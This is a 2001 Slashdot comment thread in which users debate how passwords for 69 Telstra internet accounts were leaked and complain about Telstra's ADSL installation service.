    Perhaps you could add something to the agreement to this effect. Pick a simple password, don't blame us if your account is hijacked.

    But this is all old news, isn't it?
  • These servers are not unix servers you can download the password file from. Many of the users hit were not using ADSL. The passwords given were NOT in this format. They were STRONG passwords.
  • by justinf ( 469877 ) on Sunday July 22, 2001 @12:44AM (#69615)
    There is a good article, and a good discussion thread available at http://www.whirlpool.net.au [whirlpool.net.au]. It outlines the fact that the passwords would never be stored in plaintext (the passwords are stored on industry-standard enterprise servers), and that many of the released passwords were extremely strong (suggesting the passwords were not cracked).

    It seems only natural to assume someone has spent some time collecting logins and passwords via another method, and is posting their results with the view of creating FUD over Telstra's service. Just because 69 passwords have been obtained, doesn't mean there exists a vunerability for the tens or hundreds of thousands of subscribers of the service.

    I don't particularly like Telstra, nor do I use their internet, but I dont believe they are this stupid.
  • As an Australian, I admit that I'm not pleased about some of the laws, or suggested laws, I've read about on /., but I don't think for me the US would even be a nice place for me to visit - knowing that anywhere I am, 95% of the people I see are capable of killing me instantly from a distance, I don't need that.
  • This is a joke, honestly. In fact, I wasn't really impressed with ADSL from day one when the "technical" guy came to my place to install it...I knew more about installing the damn thing than he did! He had no idea, he was reading instructions out of a manual! What annoyed me more was the fact that I e-mailed Telstra beforehand saying "why do I need to pay so much for installation when I can do it myself?" To which they replied "It is more complicated than you think". My arse it is complicated. I've had to reinstall it all several times since the initial installation, 10 times quicker than the "techincal" guy did. Topped with this was the fact that they only knew how to set it up on internet explorer and outlook express. Honestly, it wasn't that hard to get it working on netscape. Losers. My point exactly. White_Pointer

You can tune a piano, but you can't tuna fish. You can tune a filesystem, but you can't tuna fish. -- from the tunefs(8) man page

Working...